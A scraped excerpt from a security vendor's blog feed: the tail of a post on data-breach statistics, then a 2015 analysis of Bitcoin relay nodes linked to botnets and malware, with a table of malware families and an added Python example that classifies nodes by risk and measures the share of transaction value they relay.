In the face of widespread looting, compliance issues are relevant. So far, most companies have focused only on the requirements within their own political and geographical domains. More cooperation could build frameworks for broader monitoring. That would certainly be a good thing, but let’s not get the wrong idea. The report reveals that compliance alone doesn’t correlate to more effective data-loss prevention.

Just Beat It, Or Be Defeated

For cybersecurity teams to successfully secure data, one crucial area needs improvement. Internal teams’ monitoring capabilities are not up to par, and it’s hurting them. Stolen data is often sold or used before companies even notice. In fact, it’s more the norm that third parties like law enforcement discover breaches first.

Who are these eager villains, who look at organizations’ defenses thinking “just beat it?” Most of the time, external perpetrators are behind the deed. Think of nation-states, organized crime rings, and profit-hungry hackers. They’re responsible in 60-80% of cases. As for the other 20-40%, those involve people with access to confidential data. Think of contractors, partners, or employees. While protecting against external threats is clearly the priority, internal security can’t be overlooked either. Regardless of who’s responsible, no one wants to be defeated.

Who Are You? Who, Who?

What do we know about the companies being attacked? Well, if you think cybercriminals prefer to phish for a bigger catch, your hunch is right. Once we examine the median number of incidents for companies of different sizes, the trend is clear. The largest companies see the most incidents (31-50 daily), mid-sized companies experience fewer (21-30 daily), and smaller companies have the fewest (11-20 daily).

The size of a company also connects with its geographical identity. Asia-Pacific companies are smaller than the global norm on average. As you’d expect, their median corresponds to 11-20 incidents daily. On the other end of the range, Indian companies, larger than the global average, have a median of 31-50 incidents daily.

Of course, a company’s business also influences its risk. Cybercriminals are more interested in some industries than others. It’s no surprise that financial services are the hardest hit, followed by retail. Since profit is the largest motivator for attacks, we can attribute this to the temptation of payment and financial data for crooks.

However, there’s also good news. The most-threatened industries learn to prepare for threats. When companies were asked to assess how adequate their defenses were, retailers felt the most comfortable, followed by financial and healthcare organizations. Manufacturing companies ranked at the bottom of that list.

Where The Breaches Have No Name

At the end of the day, data breaches aren’t going away anytime soon. Tellingly, the speed of compromise is accelerating faster than the speed of discovery. While perpetrators need only minutes or hours to break in, security teams often need days to find out about incidents.

There’s more work to be done. But with the right knowledge, cybersecurity experts can change the tide. Intelligence is the basis for success in our industry. It all starts with knowing the who, what, when, where, why, and how of data breaches. Maybe then, news outlets will find other sensational topics, when the breaches have no names.

Finally, visit us at the upcoming FOCUS security conference at ARIA Resort and Casino in Las Vegas, Nevada. Data protection expert Rob Gresham and Larry Ponemon of the Ponemon Institute will take a deep dive into this research. Catch their talk at 11:15am on November 2nd, in Room 7-Pinyon 3.

Stay tuned for the next blog! We’ll discuss types of leaked data, how breaches occur, and employee training tips. Get updates by following @McAfee and @McAfee_Business.

Curious about something? Chat with us on the hashtag #WhoLetTheDataOut. Come on, it’s irresistibly fun to yell “who, who, who” while typing.

See you for the next blog!

Blockchain Transactions Create Risks for Financial Services
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/blockchain-transactions-create-risks-financial-services/
Thu, 17 Dec 2015 00:36:35 +0000

The post Blockchain Transactions Create Risks for Financial Services appeared first on McAfee Blogs.

This post was written by Raj Samani and Christiaan Beek of McAfee, and Shane D. Shook, PhD.

Trust is the most valuable commodity in the digital age. Failure to trust the systems or organizations in which we place our digital assets leads us to look at alternate providers, or to withdraw entirely from a suspect service. Within the financial services industry, the notion of trust is of paramount importance to institutions and account holders alike. Investors must be confident that the money they have in their accounts is available for use whenever they need it, and that the routes and terminals involved in buying Christmas presents, for example, are protected with many layers of security.

But what happens with this concept of trust if, for example, one in every 25 withdrawals made from an ATM is authorized by a bank operated by a known criminal organization? Or if one of every six credit card purchases was transacted by a terminal suspected to be controlled by known criminal organizations? It is likely the implied level of trust customers have in the financial system would be shaken; moreover, they would certainly seek a more trustworthy provider for financial transactions.

Looking at trust among cryptocurrencies, McAfee has undertaken an analysis of Bitcoin to determine the likely risk to transactions made with this increasingly popular method of payment. In particular, we focused on the risks to the security of the network that serves the “blockchain,” the public database of all Bitcoin transactions. Although our research did not identify any specific risks associated with the security of the funds exchanged, we did identify risks that may affect the reliability of the blockchain itself. Our focus was predominantly on Bitcoin relay nodes, and the integrity of those nodes.

Whenever these transaction relay nodes do not offer a sufficient level of integrity (for example, being a part of botnet operations), they could be used to manipulate Bitcoin transactions through route control, denial of service, or by modifying transaction protocols. Moreover, a botnet-controlled relay node can be monitored to reveal the identity of one party in a transaction. If enough relay nodes are connected by a botnet operator, it may even be possible to deanonymize the other parties. Further, as the blockchain and related products have evolved, vulnerabilities in software clients have cropped up. Attempts to exploit the Bitcoin peer-to-peer network are known in research as well as in the wild; thus the knowledge of botnet- or malware-associated peers is a concern.

Background
The blockchain is a public ledger that facilitates payment through cryptocurrencies (such as Bitcoin) for goods or services of more than 10,000 vendors and many thousands of individuals, including legitimate (food, airfare, books, cars) and illegitimate (malware, extortion/ransom, drugs). The blockchain is also being explored for commercial purposes with new offerings created for “secure exchange” services such as currencies, contracts, and equities trading or clearing.

The blockchain includes literal details concerning every transaction between addresses that have successfully negotiated a transfer, such as Bitcoin payments from one wallet to another, including time, sender and receiver wallet addresses, amounts, and relay IP addresses (both v4 and v6) of “bitnodes” that facilitate the transactions’ communications.

At any time there are around 9,000 active bitnodes, some that operate as “full nodes” (peers) and others that serve as relays or a type of proxy, also known as a “lightweight node.”

[Figure: 20151216 Blockchain1, active bitnode count]

Source: https://bitnodes.21.co/

Related Risks
According to data collected from Blockchain.info and Bitnodes.io (which peer with approximately 70% of active nodes), combined with open-source intelligence (OSINT) about botnets and malicious network addresses, of the nearly 145,000 unique IP addresses that relayed Bitcoin blockchain transactions between February and December 2015, approximately 2% of the bitnodes were coincidentally included for use by malware samples, and another 1% appeared on Internet blacklists related to botnet control servers or other compromised hosts. Those figures are historical summaries; viewed in real time, they reflect more significant risks to the security of blockchain transactions.

For the same period, a real-time review of active bitnodes (available peers) demonstrated that at any given time 4% of bitnode addresses were included for use by malware samples (available for review on Virustotal.com), and an additional 13% of bitnodes appeared on public Internet blacklists. Thus, in effect, one in six Bitcoin transactions was relayed by nodes under the control of malicious operators. The difference between the historical and real-time statistics is simple: bitnodes that correspond with malware or botnets act as blockchain relays more often than others.

For example, let’s look at the following details of a bitnode active on December 2:

[Figure: 20151216 Blockchain2, details of a bitnode active on December 2]

The malware sample that used the preceding bitnode (IP address) was a Fujacks Trojan, a well-documented botnet backdoor that allows a botmaster to remotely control the infected computer, collect information, and install other malware or tools that suit the botmaster’s (or subscribers’) interests.

[Figure: 20151216 Blockchain3]

This bitnode has been active since November 24:

[Figure: 20151216 Blockchain4, bitnode active since November 24]

The associated malware is the Sefnit Trojan, a botnet backdoor that not only allows the botmaster to remotely control the host, but upon installation also injects a TOR client to mask botnet communications. Compromised computers could suffer the installation of any malicious tools. For example, past infections of Sefnit include ad-click fraud. There is also documented coincidental history of the use of Sefnit by malicious botmasters to mine bitcoins using infected computers. As with many botnets, takedown efforts are sometimes temporary, and the subsequent utility of the botnet changes and on occasion expands.

[Figure: 20151216 Blockchain5]

Our analysis of the varied malware samples that relate to bitnode addresses which have relayed blockchain transactions during the past 18 months demonstrates that most of the botnets are related to Zeus. Zeus source code has been readily available (in several publicly released iterations and sold in specific versions) since at least 2011. It is a popular “starter kit” for botnet creation, and anyone with relatively modest technical capabilities can build and operate a botnet. More important though, botnets offer subscriber services that can facilitate more exotic crimes than simply compromising access to a computer.

The preceding Sefnit malware sample used that bitnode (IP) address as a TOR relay address, so that not only Bitcoin transactions would relay through that bitnode, but other TOR users could also use that host. Unfortunately, those users were not only legitimate TOR users: computers infected with that Sefnit malware were inducted into a botnet that used that same TOR relay (coincidentally the bitnode address).

OSINT and McAfee threat intelligence, respectively, confirmed that 3% of the unique bitnode addresses observed between February and December 2015 were included in malware samples for botnet communications, as control or routing. Of those addresses, the following 30 bitnodes accounted for 25% of associated malware submissions.

[Figure: 20151216 Blockchain6, the 30 bitnodes accounting for 25% of associated malware submissions]

Our analysis of submitted malware samples that used those bitnode addresses indicated that 83% of related samples were from the following malware families:

Malware in Top 30 Bitnode Addresses (Feb–Dec 2015) With Number of Submissions

Family        Submissions
Allaple             4,611
Kelihos               860
Bladabindi            378
Pykspa                106
Bulta                  71
Fynloski               71
Zbot                   65
Dynamer                61
Sality                 57
Virut                  53
Carberp                52
Renos                  42
Dugenpal               41
Bagsu                  35
Glupteba               32
Swrort                 28
Waledac                25
Skeeyah                25
Omaneat                24
Runpoor                18
Dacic                  11
Senta                   8
Sisron                  6
Vitro                   5
Teerac                  5
Peaac                   4
Bumat                   3
Reveton                 1
Simda                   1

Where are they?
This raises the question: Which came first? Was the bitnode (host) set up by a botmaster for nefarious purposes, or was a host compromised and misused for botnet control purposes? As far as blockchain uses go, does it matter? The result is the same: the particular host is under botnet control.

Many people mistakenly assume that blockchain transactions are always protected by the use of TOR; however, our analysis of the IP addresses regarding TOR nodes indicates that less than 0.25% of known bitnodes are also TOR nodes. TOR is commonly recommended for use with blockchain software clients, so the coincidence of bitnodes that also serve as TOR nodes is an additional risk to be considered by vendors or subscribers to blockchain technology.

The following map shows the geographic layout of TOR nodes on December 2.

[Figure: 20151216 Blockchain7, geographic layout of TOR nodes on December 2]

Source: http://cdetr.io/tor-node-map/

Bitnodes are deployed globally according to concentrations of users who support the technology. Consequently, the nodes that coincidentally are used for other purposes (such as TOR or malware control) are equally global in their geolocations. There is general overlap in geographic regions between TOR and bitnodes, although the overlap in addresses is very limited.

[Figure: 20151216 Blockchain8, geographic distribution of bitnodes]

Source: https://bitnodes.21.co/

Applying OSINT to the blockchain
By using OSINT and proprietary information we can create dispositions of bitnodes by their risk categories. The following map indicates the regional concentrations (on December 2) by bitnodes as (red) Suspicious, (blue) Interesting, and (yellow) Normal. “Suspicious” indicates a bitnode that appears on blacklists and has high detection rates in samples that use the bitnode address. “Interesting” is a bitnode address that is a known TOR exit node or appears in any malware samples. “Normal” encompasses all others.

[Figure: 20151216 Blockchain9, regional concentrations of Suspicious (red), Interesting (blue) and Normal (yellow) bitnodes on December 2]

Only a relatively small percentage (17%) of nodes are Suspicious or Interesting. The following chart shows the breakout of Suspicious nodes by country code.

[Figure: 20151216 Blockchain10, Suspicious nodes by country code]

Other host providers include cloud services and public or free Internet hosts. Such services are sought out and used extensively by botmasters as they often allow limited free use, or full subscription use for a defined period (commonly one to three months before they are abandoned or terminated). Indeed, between February and December, 20% of all unique bitnodes we analyzed existed for no more than one day, 72% for less than one month, 99% for less than three months, and less than 1% existed for more than three months.

More on TOR
The coincidence of the TOR network and bitnodes may be more than OSINT demonstrates. For example, in December 2014 the “LizardSquad” hacked the TOR network, taking control of 30% to 40% of active nodes. One effect of the attacks was an increase in new bitnodes.

The following graph illustrates a 4% increase in Normal nodes and a 1% increase in Suspicious nodes, with a 4% decrease in Interesting nodes that occurred on December 26, 2014, when the TOR attacks began.

[Figure: 20151216 Blockchain11, change in Normal, Suspicious and Interesting node counts on December 26, 2014]

This data could be interpreted to mean that the additional nodes were botnet nodes previously masked by TOR. The new interesting and suspicious nodes were the product of antimalware submissions and blacklist updates that were reported by researchers. By December 30, 2014, the TOR network had recovered, and the number of visible bitnodes decreased as they were again masked; in the interim, however, the aggregate had increased to an estimated 23% of all bitnodes related to botnets.

In effect, the December 2014 attacks by LizardSquad (and subsequent research performed by security organizations around the world) revealed previously unknown nodes on the Bitcoin network, some associated with malware or botnets. This demonstrates the extent (about 6%) of TOR nodes that provided anonymity to blockchain transactions—at least in that period.

What this means for financial risk
Bitcoin has an estimated market cap of $5.4 billion. On December 2, 2015, a total of $634 million (depending on the exchange venue) in transaction value was routed through the global bitnodes. Although only the noted 17% of bitnodes are indicated to be “known associates” of malware or botnets, those nodes accounted for 31% of the volume of (unconfirmed) transactions relayed that day. In other words, almost $200 million of Bitcoin transactions were relayed through suspect nodes.
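The disposition rules defined under “Applying OSINT to the blockchain” and the volume calculation in the paragraph above can be expressed as a small piece of analysis code. The following is an added example written for this page, not McAfee’s analysis tooling: it assigns each relay node to Suspicious, Interesting or Normal using exactly the post’s definitions (blacklist plus high detection rate in samples; TOR exit or any malware sample; everything else), then measures what share of nodes and what share of relayed value fall outside Normal. The node records, blacklist flags, sample counts, detection rates, relayed amounts and the 50% “high detection” cut-off are all constructed; the post gives no numeric threshold, so that value is an assumption.

```python
"""Added example, not McAfee's analysis code: dispositioning Bitcoin relay nodes
into the Suspicious / Interesting / Normal categories defined above, then
measuring what share of relayed transaction value went through non-Normal
nodes. The node records, blacklist flags, detection rates, relayed amounts and
the 50% "high detection" cut-off are all constructed; the post does not give
a numeric threshold."""
from dataclasses import dataclass


@dataclass
class Bitnode:
    ip: str                 # documentation-range addresses (RFC 5737), constructed
    on_blacklist: bool      # listed as a botnet controller or compromised host
    tor_exit: bool          # known TOR exit node
    malware_samples: int    # number of malware samples that embed this address
    detection_rate: float   # mean AV detection ratio across those samples, 0..1
    relayed_value: float    # transaction value relayed on the observation day


HIGH_DETECTION = 0.5   # constructed cut-off for "high detection rate"


def disposition(node: Bitnode) -> str:
    """Apply the post's categories in order of severity.
    Suspicious: on a blacklist AND high detection rate in samples using the address.
    Interesting: a known TOR exit node OR present in any malware sample.
    Normal: everything else, including a blacklisted host that no sample references."""
    if (node.on_blacklist and node.malware_samples > 0
            and node.detection_rate >= HIGH_DETECTION):
        return "Suspicious"
    if node.tor_exit or node.malware_samples > 0:
        return "Interesting"
    return "Normal"


def summarize(nodes: list) -> dict:
    """Node count and relayed value per category, plus the share of nodes and of
    value attributable to Suspicious + Interesting ("suspect") nodes."""
    by_category = {}
    for n in nodes:
        cat = disposition(n)
        count, value = by_category.get(cat, (0, 0.0))
        by_category[cat] = (count + 1, value + n.relayed_value)
    total_value = sum(n.relayed_value for n in nodes)
    suspect_count = sum(c for cat, (c, _) in by_category.items() if cat != "Normal")
    suspect_value = sum(v for cat, (_, v) in by_category.items() if cat != "Normal")
    return {
        "by_category": by_category,
        "suspect_node_share": suspect_count / len(nodes),
        "suspect_value_share": suspect_value / total_value,
    }


# Constructed observation: ten relay nodes seen on one day.
SAMPLE_NODES = [
    Bitnode("192.0.2.10", True, False, 12, 0.83, 120.0),   # blacklisted, high detection
    Bitnode("192.0.2.11", False, True, 0, 0.0, 80.0),      # TOR exit, no samples
    Bitnode("192.0.2.12", True, False, 0, 0.0, 25.0),      # blacklisted only -> Normal
] + [Bitnode(f"198.51.100.{i}", False, False, 0, 0.0, 25.0) for i in range(1, 8)]


if __name__ == "__main__":
    s = summarize(SAMPLE_NODES)
    print(s["by_category"])
    print(f"suspect nodes: {s['suspect_node_share']:.0%} of nodes, "
          f"{s['suspect_value_share']:.0%} of relayed value")
```

On the constructed sample the two non-Normal nodes are 20% of the population but relay 50% of the value, the same shape as the 17%-of-nodes, 31%-of-volume finding above: nodes that correspond with malware or botnets relay more often than others, so counting nodes understates the exposure. Note the edge case made explicit in disposition: a host that is blacklisted but never appears in a malware sample lands in Normal under the post’s definitions, which is a reason to treat the categories as a floor rather than a complete risk picture.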

What does this mean? There is no risk of these funds being stolen because the blockchain has mechanisms to protect the transaction with distributed (and autonomous) processing and validation. There are, however, availability concerns that go beyond simple outages, for example, the possibility of “value” impediments because the route is manipulated in the peer map of related clients. (The exchange value of Bitcoin is related in part to the volume available for trading and the availability of peers to process the transactions.) Outages may be brief, but they have immediate consequences as peer discovery from “good” to “bad” nodes depends fundamentally on the availability of good nodes.

Beyond interruptions, there is the risk of malicious entities gaining insights into transactions. Botmasters can simply monitor the peers that they control to understand the origin and valuable details of the transactions in their exchange form. Although they will not see into traded contracts, or be able to steal from cryptocurrency exchanges, they can monitor who is trading with whom and how often—and potentially control when/if and where their traffic is able to route.

The health of any network is crucial to the integrity of the service it supports. Financial products and services related to the blockchain may be affected by botnet- or malware-associated nodes that relay transactions, currently or in the future, as the sophistication of attacks and exploits continues.

A final note
Much more specific details of risks are available when the blockchain (ledger) and bitnodes are tied to threat intelligence. On December 2 two ransomware payment addresses for Virlock were used in 14 transactions. Five of the 14 transactions were relayed by bitnodes associated with malware or botnets. Although blacklisting Bitcoin addresses can be a difficult proposition (as many addresses have been stolen from legitimate users’ wallets over time and misused in much the same way that stolen credit card numbers are used sporadically by cybercriminals), some insights of specific addresses are useful to understanding the risk of transactions made with otherwise “anonymous” counterparties.

We might conclude from this research that Bitcoin is a payment platform that cannot be trusted, but that is not the case. We do depend on a trustworthy payment platform, and understanding the associated risks allows us to build appropriate controls to mitigate those risks to tolerable levels. Bitcoin, much like any other payment platform (electronic as well as physical), has risks associated with it that appear to be specific to a decentralized virtual currency. Our intention is to highlight some of these risks so that measures can be introduced to mitigate them to a level acceptable to all of us operating within this digital society.